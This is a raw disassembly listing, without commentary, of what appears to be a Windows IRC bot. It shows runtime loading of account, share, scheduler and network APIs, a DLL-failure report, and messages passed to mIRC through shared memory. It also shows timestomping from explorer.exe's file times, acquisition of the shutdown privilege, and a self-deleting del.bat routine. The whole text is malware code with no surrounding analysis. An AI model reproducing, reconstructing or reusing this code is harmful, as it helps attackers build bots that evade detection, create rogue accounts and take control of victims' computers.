mov dword_4334D4, eax
call esi ; GetProcAddress
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov dword_433448, eax
call esi ; GetProcAddress
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov dword_4334A8, eax
call esi ; GetProcAddress
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov dword_433420, eax
call esi ; GetProcAddress
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov dword_43354C, eax
call esi ; GetProcAddress
cmp dword_433428, ebx
mov ecx, dword_433448
mov dword_4334FC, eax
jz short loc_404ED6
cmp dword_4335E8, ebx
jz short loc_404ED6
cmp dword_4334C8, ebx
jz short loc_404ED6
cmp dword_4335E4, ebx
jz short loc_404ED6
cmp dword_4334D4, ebx
jz short loc_404ED6
cmp ecx, ebx
jz short loc_404ED6
cmp dword_4334A8, ebx
jz short loc_404ED6
cmp dword_433420, ebx
jz short loc_404ED6
cmp dword_43354C, ebx
jz short loc_404ED6
cmp eax, ebx
jnz short loc_404EE0
loc_404ED6: ; CODE XREF: sub_40468E+806�j
; sub_40468E+80E�j ...
mov dword_433618, 1
loc_404EE0: ; CODE XREF: sub_40468E+846�j
cmp ecx, ebx
jz short loc_404F15
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx
cmp eax, ebx
mov dword_4335E0, eax
jnz short loc_404F15
jmp short loc_404F0F
; ---------------------------------------------------------------------------
loc_404EFA: ; CODE XREF: sub_40468E+772�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_43361C, eax
mov dword_433618, 1
loc_404F0F: ; CODE XREF: sub_40468E+86A�j
mov dword_4335E0, ebx
loc_404F15: ; CODE XREF: sub_40468E+854�j
; sub_40468E+868�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_404F5F
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; GetProcAddress
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov dword_4334F0, eax
call esi ; GetProcAddress
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov dword_433524, eax
call esi ; GetProcAddress
cmp dword_4334F0, ebx
mov dword_433588, eax
jz short loc_404F6A
cmp dword_433524, ebx
jz short loc_404F6A
cmp eax, ebx
jnz short loc_404F74
jmp short loc_404F6A
; ---------------------------------------------------------------------------
loc_404F5F: ; CODE XREF: sub_40468E+892�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433624, eax
loc_404F6A: ; CODE XREF: sub_40468E+8C1�j
; sub_40468E+8C9�j ...
mov dword_433620, 1
loc_404F74: ; CODE XREF: sub_40468E+8CD�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40506A
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; GetProcAddress
push offset aNetsharedel ; "NetShareDel"
push edi
mov dword_433488, eax
call esi ; GetProcAddress
push offset aNetshareenum ; "NetShareEnum"
push edi
mov dword_4334A4, eax
call esi ; GetProcAddress
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov dword_4335A0, eax
call esi ; GetProcAddress
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov dword_433454, eax
call esi ; GetProcAddress
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov dword_4334D8, eax
call esi ; GetProcAddress
push offset aNetuseradd ; "NetUserAdd"
push edi
mov dword_43341C, eax
call esi ; GetProcAddress
push offset aNetuserdel ; "NetUserDel"
push edi
mov dword_43346C, eax
call esi ; GetProcAddress
push offset aNetuserenum ; "NetUserEnum"
push edi
mov dword_433568, eax
call esi ; GetProcAddress
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov dword_433480, eax
call esi ; GetProcAddress
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov dword_43348C, eax
call esi ; GetProcAddress
cmp dword_433488, ebx
mov dword_4334B4, eax
jz short loc_405075
cmp dword_4334A4, ebx
jz short loc_405075
cmp dword_4335A0, ebx
jz short loc_405075
cmp dword_433454, ebx
jz short loc_405075
cmp dword_4334D8, ebx
jz short loc_405075
cmp dword_43341C, ebx
jz short loc_405075
cmp dword_43346C, ebx
jz short loc_405075
cmp dword_433568, ebx
jz short loc_405075
cmp dword_433480, ebx
jz short loc_405075
cmp dword_43348C, ebx
jz short loc_405075
cmp eax, ebx
jnz short loc_40507F
jmp short loc_405075
; ---------------------------------------------------------------------------
loc_40506A: ; CODE XREF: sub_40468E+8F1�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_43362C, eax
loc_405075: ; CODE XREF: sub_40468E+98C�j
; sub_40468E+994�j ...
mov dword_433628, 1
loc_40507F: ; CODE XREF: sub_40468E+9D8�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4050B4
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; GetProcAddress
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov dword_433584, eax
call esi ; GetProcAddress
cmp dword_433584, ebx
mov dword_433504, eax
jz short loc_4050BF
cmp eax, ebx
jnz short loc_4050C9
jmp short loc_4050BF
; ---------------------------------------------------------------------------
loc_4050B4: ; CODE XREF: sub_40468E+9FC�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433634, eax
loc_4050BF: ; CODE XREF: sub_40468E+A1E�j
; sub_40468E+A24�j
mov dword_433630, 1
loc_4050C9: ; CODE XREF: sub_40468E+A22�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4050FE
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; GetProcAddress
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov dword_4334AC, eax
call esi ; GetProcAddress
cmp dword_4334AC, ebx
mov dword_43350C, eax
jz short loc_405109
cmp eax, ebx
jnz short loc_405113
jmp short loc_405109
; ---------------------------------------------------------------------------
loc_4050FE: ; CODE XREF: sub_40468E+A46�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_43363C, eax
loc_405109: ; CODE XREF: sub_40468E+A68�j
; sub_40468E+A6E�j
mov dword_433638, 1
loc_405113: ; CODE XREF: sub_40468E+A6C�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_405172
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; GetProcAddress
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov dword_433540, eax
call esi ; GetProcAddress
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov dword_4335D0, eax
call esi ; GetProcAddress
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov dword_43347C, eax
call esi ; GetProcAddress
cmp dword_433540, ebx
mov dword_433440, eax
jz short loc_40517D
cmp dword_4335D0, ebx
jz short loc_40517D
cmp dword_43347C, ebx
jz short loc_40517D
cmp eax, ebx
jnz short loc_405187
jmp short loc_40517D
; ---------------------------------------------------------------------------
loc_405172: ; CODE XREF: sub_40468E+A90�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433644, eax
loc_40517D: ; CODE XREF: sub_40468E+ACC�j
; sub_40468E+AD4�j ...
mov dword_433640, 1
loc_405187: ; CODE XREF: sub_40468E+AE0�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4051BC
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; GetProcAddress
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov dword_4335A8, eax
call esi ; GetProcAddress
cmp dword_4335A8, ebx
mov dword_433474, eax
jz short loc_4051C7
cmp eax, ebx
jnz short loc_4051D1
jmp short loc_4051C7
; ---------------------------------------------------------------------------
loc_4051BC: ; CODE XREF: sub_40468E+B04�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_43364C, eax
loc_4051C7: ; CODE XREF: sub_40468E+B26�j
; sub_40468E+B2C�j
mov dword_433648, 1
loc_4051D1: ; CODE XREF: sub_40468E+B2A�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40525A
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; GetProcAddress
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov dword_43358C, eax
call esi ; GetProcAddress
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov dword_43345C, eax
call esi ; GetProcAddress
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov dword_4335A4, eax
call esi ; GetProcAddress
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov dword_4334C4, eax
call esi ; GetProcAddress
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov dword_433550, eax
call esi ; GetProcAddress
cmp dword_43358C, ebx
mov dword_433468, eax
jz short loc_405265
cmp dword_43345C, ebx
jz short loc_405265
cmp dword_4335A4, ebx
jz short loc_405265
cmp dword_4334C4, ebx
jz short loc_405265
cmp dword_433550, ebx
jz short loc_405265
cmp eax, ebx
jnz short loc_40526F
jmp short loc_405265
; ---------------------------------------------------------------------------
loc_40525A: ; CODE XREF: sub_40468E+B4E�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433654, eax
loc_405265: ; CODE XREF: sub_40468E+BA4�j
; sub_40468E+BAC�j ...
mov dword_433650, 1
loc_40526F: ; CODE XREF: sub_40468E+BC8�j
pop edi
pop esi
xor eax, eax
pop ebp
inc eax
pop ebx
retn
sub_40468E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405277 proc near ; CODE XREF: sub_4078FA+424B�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_4]
push esi
xor esi, esi
cmp dword_4335F0, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_4052BF
push dword_4335F4
lea eax, [ebp+var_200]
push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_4052BF: ; CODE XREF: sub_405277+1A�j
cmp dword_4335F8, esi
jz short loc_4052F3
push dword_4335FC
lea eax, [ebp+var_200]
push offset aUser32_dllFail ; "User32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_4052F3: ; CODE XREF: sub_405277+4E�j
cmp dword_433600, esi
jz short loc_405327
push dword_433604
lea eax, [ebp+var_200]
push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_405327: ; CODE XREF: sub_405277+82�j
cmp dword_433608, esi
jz short loc_40535B
push dword_43360C
lea eax, [ebp+var_200]
push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_40535B: ; CODE XREF: sub_405277+B6�j
cmp dword_433610, esi
jz short loc_40538F
push dword_433614
lea eax, [ebp+var_200]
push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_40538F: ; CODE XREF: sub_405277+EA�j
cmp dword_433618, esi
jz short loc_4053C3
push dword_43361C
lea eax, [ebp+var_200]
push offset aWininet_dllFai ; "Wininet.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_4053C3: ; CODE XREF: sub_405277+11E�j
cmp dword_433620, esi
jz short loc_4053F7
push dword_433624
lea eax, [ebp+var_200]
push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_4053F7: ; CODE XREF: sub_405277+152�j
cmp dword_433628, esi
jz short loc_40542B
push dword_43362C
lea eax, [ebp+var_200]
push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_40542B: ; CODE XREF: sub_405277+186�j
cmp dword_433630, esi
jz short loc_40545F
push dword_433634
lea eax, [ebp+var_200]
push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_40545F: ; CODE XREF: sub_405277+1BA�j
cmp dword_433638, esi
jz short loc_405493
push dword_43363C
lea eax, [ebp+var_200]
push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_405493: ; CODE XREF: sub_405277+1EE�j
cmp dword_433640, esi
jz short loc_4054C7
push dword_433644
lea eax, [ebp+var_200]
push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_4054C7: ; CODE XREF: sub_405277+222�j
cmp dword_433648, esi
jz short loc_4054FB
push dword_43364C
lea eax, [ebp+var_200]
push offset aShell32_dllFai ; "Shell32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_4054FB: ; CODE XREF: sub_405277+256�j
cmp dword_433650, esi
jz short loc_40552F
push dword_433654
lea eax, [ebp+var_200]
push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
loc_40552F: ; CODE XREF: sub_405277+28A�j
lea eax, [ebp+var_200]
push offset aMainDllTestCom ; "[MAIN]: DLL test complete."
push eax
call sub_412BB5
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_40555C
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40555C: ; CODE XREF: sub_405277+2CE�j
lea eax, [ebp+var_200]
push eax
call sub_401C33
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_405277 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40556E proc near ; CODE XREF: sub_4078FA+A6A�p
; sub_4078FA+A9D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz loc_405645
mov eax, [ebp+arg_4]
cmp eax, esi
jz loc_405645
cmp [ebp+arg_8], esi
jz loc_405645
cmp byte ptr [eax], 0
jz loc_405645
push ebx
push edi
call sub_41E867
mov ebx, eax
test ebx, ebx
pop ecx
jz loc_405640
push [ebp+arg_4]
push edi
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_405639
sub eax, edi
push eax
push edi
push ebx
call sub_412C40
mov eax, ebx
sub eax, edi
add esp, 0Ch
and byte ptr [eax+esi], 0
mov eax, [ebp+arg_8]
lea ecx, [eax+1]
loc_4055DB: ; CODE XREF: sub_40556E+72�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4055DB
sub eax, ecx
push eax
push [ebp+arg_8]
push ebx
call sub_412A80
mov eax, [ebp+arg_4]
add esp, 0Ch
lea ecx, [eax+1]
loc_4055F7: ; CODE XREF: sub_40556E+8E�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4055F7
sub eax, ecx
add eax, esi
mov esi, eax
loc_405604: ; CODE XREF: sub_40556E+9B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_405604
mov edi, ebx
sub eax, esi
dec edi
loc_405610: ; CODE XREF: sub_40556E+A8�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_405610
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov esi, [ebp+arg_0]
mov edx, esi
mov eax, ebx
sub edx, ebx
loc_40562F: ; CODE XREF: sub_40556E+C9�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40562F
loc_405639: ; CODE XREF: sub_40556E+50�j
push ebx
call sub_412FE4
pop ecx
loc_405640: ; CODE XREF: sub_40556E+3B�j
mov eax, esi
pop ebx
jmp short loc_405647
; ---------------------------------------------------------------------------
loc_405645: ; CODE XREF: sub_40556E+C�j
; sub_40556E+17�j ...
xor eax, eax
loc_405647: ; CODE XREF: sub_40556E+D5�j
pop edi
pop esi
pop ebp
retn
sub_40556E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40564B proc near ; CODE XREF: sub_40751F+C2�p
var_7D0 = dword ptr -7D0h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push edi
xor eax, eax
mov ecx, 1F4h
lea edi, [ebp+var_7D0]
rep stosd
mov ecx, [ebp+arg_0]
mov eax, ecx
lea esi, [eax+1]
loc_40566E: ; CODE XREF: sub_40564B+28�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40566E
sub eax, esi
xor ebx, ebx
mov edi, eax
inc ebx
cmp edi, ebx
jge short loc_405685
or eax, 0FFFFFFFFh
jmp short loc_4056E5
; ---------------------------------------------------------------------------
loc_405685: ; CODE XREF: sub_40564B+33�j
xor edx, edx
test edi, edi
mov [ebp+var_7D0], ecx
jle short loc_4056A5
loc_405691: ; CODE XREF: sub_40564B+58�j
mov al, [edx+ecx]
cmp al, 0Ah
jz short loc_40569C
cmp al, 0Dh
jnz short loc_4056A0
loc_40569C: ; CODE XREF: sub_40564B+4B�j
and byte ptr [edx+ecx], 0
loc_4056A0: ; CODE XREF: sub_40564B+4F�j
inc edx
cmp edx, edi
jl short loc_405691
loc_4056A5: ; CODE XREF: sub_40564B+44�j
xor esi, esi
test edi, edi
jle short loc_4056CF
loc_4056AB: ; CODE XREF: sub_40564B+82�j
cmp byte ptr [esi+ecx], 0
jnz short loc_4056CA
lea edx, [esi+ecx+1]
cmp byte ptr [edx], 0
jz short loc_4056CA
cmp ebx, 1F4h
jge short loc_4056CF
mov [ebp+ebx*4+var_7D0], edx
inc ebx
loc_4056CA: ; CODE XREF: sub_40564B+64�j
; sub_40564B+6D�j
inc esi
cmp esi, edi
jl short loc_4056AB
loc_4056CF: ; CODE XREF: sub_40564B+5E�j
; sub_40564B+75�j
mov edi, [ebp+arg_4]
test edi, edi
jz short loc_4056E3
mov ecx, 1F4h
lea esi, [ebp+var_7D0]
rep movsd
loc_4056E3: ; CODE XREF: sub_40564B+89�j
mov eax, ebx
loc_4056E5: ; CODE XREF: sub_40564B+38�j
pop edi
pop esi
pop ebx
leave
retn
sub_40564B endp
; =============== S U B R O U T I N E =======================================
sub_4056EA proc near ; CODE XREF: sub_405A98+26�p
; sub_405AD5+79�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax
call sub_413A6E
cmp al, 61h
pop ecx
jl short loc_405705
cmp al, 7Ah
jg short loc_405705
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_405705: ; CODE XREF: sub_4056EA+E�j
; sub_4056EA+12�j
xor eax, eax
retn
sub_4056EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405708 proc near ; CODE XREF: sub_4078FA+2B12�p
; sub_4078FA+3596�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
call ds:dword_41F008 ; RtlGetLastWin32Error
push 0
push 100h
mov esi, eax
lea eax, [ebp+var_100]
push eax
push 400h
push esi
push 0
push 1200h
call ds:dword_41F07C ; FormatMessageA
lea eax, [ebp+var_100]
loc_405741: ; CODE XREF: sub_405708+46�j
mov cl, [eax]
cmp cl, 1Fh
jg short loc_40574D
cmp cl, 9
jnz short loc_405750
loc_40574D: ; CODE XREF: sub_405708+3E�j
inc eax
jmp short loc_405741
; ---------------------------------------------------------------------------
loc_405750: ; CODE XREF: sub_405708+43�j
; sub_405708+5B�j ...
and byte ptr [eax], 0
dec eax
lea ecx, [ebp+var_100]
cmp eax, ecx
jb short loc_40576A
mov cl, [eax]
cmp cl, 2Eh
jz short loc_405750
cmp cl, 21h
jl short loc_405750
loc_40576A: ; CODE XREF: sub_405708+54�j
push esi
lea eax, [ebp+var_100]
push eax
push [ebp+arg_0]
mov esi, offset dword_433660
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h
push esi
call sub_412E0D
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_405708 endp
; =============== S U B R O U T I N E =======================================
sub_405792 proc near ; CODE XREF: sub_4078FA+41DF�p
push esi
push 0
call dword_43344C
test eax, eax
jz short loc_4057C9
push 1
call dword_4335CC
mov esi, eax
test esi, esi
jz short loc_4057C9
push edi
push esi
call ds:dword_41F084 ; GlobalLock
push esi
mov edi, eax
call ds:dword_41F080 ; GlobalUnlock
call dword_433430
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4057C9: ; CODE XREF: sub_405792+B�j
; sub_405792+19�j
xor eax, eax
pop esi
retn
sub_405792 endp
; =============== S U B R O U T I N E =======================================
sub_4057CD proc near ; CODE XREF: sub_4078FA+34F6�p
arg_0 = dword ptr 4
push ebp
push esi
push edi
xor esi, esi
push esi
mov edi, offset aMirc_0 ; "mIRC"
push edi
call dword_4334F8
mov ebp, eax
cmp ebp, esi
jz short loc_405849
push ebx
push edi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call ds:dword_41F090 ; CreateFileMappingA
push esi
push esi
push esi
mov edi, eax
push 0F001Fh
push edi
call ds:dword_41F08C ; MapViewOfFile
push [esp+10h+arg_0]
mov ebx, eax
push ebx
call sub_412BB5
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call dword_433560
push esi
push 1
push 4C9h
push ebp
call dword_433560
push ebx
call ds:dword_41F088 ; UnmapViewOfFile
push edi
call ds:dword_41F034 ; CloseHandle
xor eax, eax
inc eax
pop ebx
jmp short loc_40584B
; ---------------------------------------------------------------------------
loc_405849: ; CODE XREF: sub_4057CD+16�j
xor eax, eax
loc_40584B: ; CODE XREF: sub_4057CD+7A�j
pop edi
pop esi
pop ebp
retn
sub_4057CD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40584F proc near ; CODE XREF: sub_40D1EF+21E�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push esi
xor esi, esi
push esi
lea eax, [ebp+var_11C]
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call dword_4334C0
test eax, eax
jz short loc_4058F0
push ebx
push edi
push esi
mov edi, 80h
push edi
push 3
push esi
mov esi, ds:dword_41F03C
push 1
push 80000000h
lea eax, [ebp+var_11C]
push eax
call esi ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_4058EE
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call ds:dword_41F098 ; GetFileTime
push ebx
mov ebx, ds:dword_41F034
call ebx ; CloseHandle
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4058EE
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_41F094 ; SetFileTime
push esi
call ebx ; CloseHandle
loc_4058EE: ; CODE XREF: sub_40584F+51�j
; sub_40584F+87�j
pop edi
pop ebx
loc_4058F0: ; CODE XREF: sub_40584F+28�j
pop esi
leave
retn
sub_40584F endp
; =============== S U B R O U T I N E =======================================
sub_4058F3 proc near ; CODE XREF: sub_4078FA+11A9�p
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_40707D
pop ecx
pop ecx
push 50005h
push 6
call dword_433538
neg eax
sbb eax, eax
neg eax
retn
sub_4058F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405915 proc near ; CODE XREF: sub_401F06+495�p
; sub_4078FA+4492�p
var_764 = byte ptr -764h
var_364 = byte ptr -364h
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_14 = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push ebx
xor ebx, ebx
cmp dword_42AE58, ebx
push esi
jz short loc_405939
cmp dword_433600, ebx
jnz short loc_405939
push ebx
call sub_401E73
pop ecx
loc_405939: ; CODE XREF: sub_405915+13�j
; sub_405915+1B�j
lea eax, [ebp+var_764]
push eax
push 400h
call ds:dword_41F0A4 ; GetTempPathA
lea eax, [ebp+var_764]
push eax
lea eax, [ebp+var_260]
push offset aSdel_bat ; "%sdel.bat"
push eax
call sub_412BB5
add esp, 0Ch
push ebx
push ebx
push 2
push ebx
push ebx
push 40000000h
lea eax, [ebp+var_260]
push eax
call ds:dword_41F03C ; CreateFileA
mov esi, eax
cmp esi, ebx
jbe loc_405A94
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax
call sub_412BB5
lea eax, [ebp+var_764]
add esp, 0Ch
lea edx, [eax+1]
loc_4059AC: ; CODE XREF: sub_405915+9C�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4059AC
push edi
push ebx
lea ecx, [ebp+var_4]
push ecx
sub eax, edx
push eax
lea eax, [ebp+var_764]
push eax
push esi
call ds:dword_41F038 ; WriteFile
push esi
call ds:dword_41F034 ; CloseHandle
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
push 11h
stosd
pop ecx
xor eax, eax
lea edi, [ebp+var_58]
rep stosd
mov esi, 104h
push esi
lea eax, [ebp+var_15C]
push eax
push ebx
mov [ebp+var_4C], 41FA76h
mov [ebp+var_58], 44h
mov [ebp+var_2C], 1
mov [ebp+var_28], bx
call ds:dword_41F078 ; GetModuleHandleA
push eax
call ds:dword_41F010 ; GetModuleFileNameA
lea eax, [ebp+var_15C]
push eax
call ds:dword_41F06C ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
pop edi
jz short loc_405A3D
push 80h
lea eax, [ebp+var_15C]
push eax
call ds:dword_41F0A0 ; SetFileAttributesA
loc_405A3D: ; CODE XREF: sub_405915+114�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax
call sub_412BB5
add esp, 10h
push esi
lea eax, [ebp+var_364]
push eax
lea eax, [ebp+var_764]
push eax
call ds:dword_41F09C ; ExpandEnvironmentStringsA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push ebx
push ebx
push 4010h
push ebx
push ebx
push ebx
lea eax, [ebp+var_364]
push eax
push ebx
call ds:dword_41F030 ; CreateProcessA
loc_405A94: ; CODE XREF: sub_405915+6D�j
pop esi
pop ebx
leave
retn
sub_405915 endp
; =============== S U B R O U T I N E =======================================
sub_405A98 proc near ; CODE XREF: sub_405AD5+41�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
rep stosd
lea edi, [eax-1]
xor esi, esi
test edi, edi
jl short loc_405AD2
push ebx
mov ebx, edi
loc_405AB5: ; CODE XREF: sub_405A98+37�j
mov eax, [esp+0Ch+arg_0]
movsx eax, byte ptr [esi+eax]
push eax
call sub_4056EA
pop ecx
mov ecx, [esp+0Ch+arg_8]
inc esi
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_405AB5
pop ebx
loc_405AD2: ; CODE XREF: sub_405A98+18�j
pop edi
pop esi
retn
sub_405A98 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405AD5 proc near ; CODE XREF: sub_401D13+10�p
; sub_401D45+A0�p
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
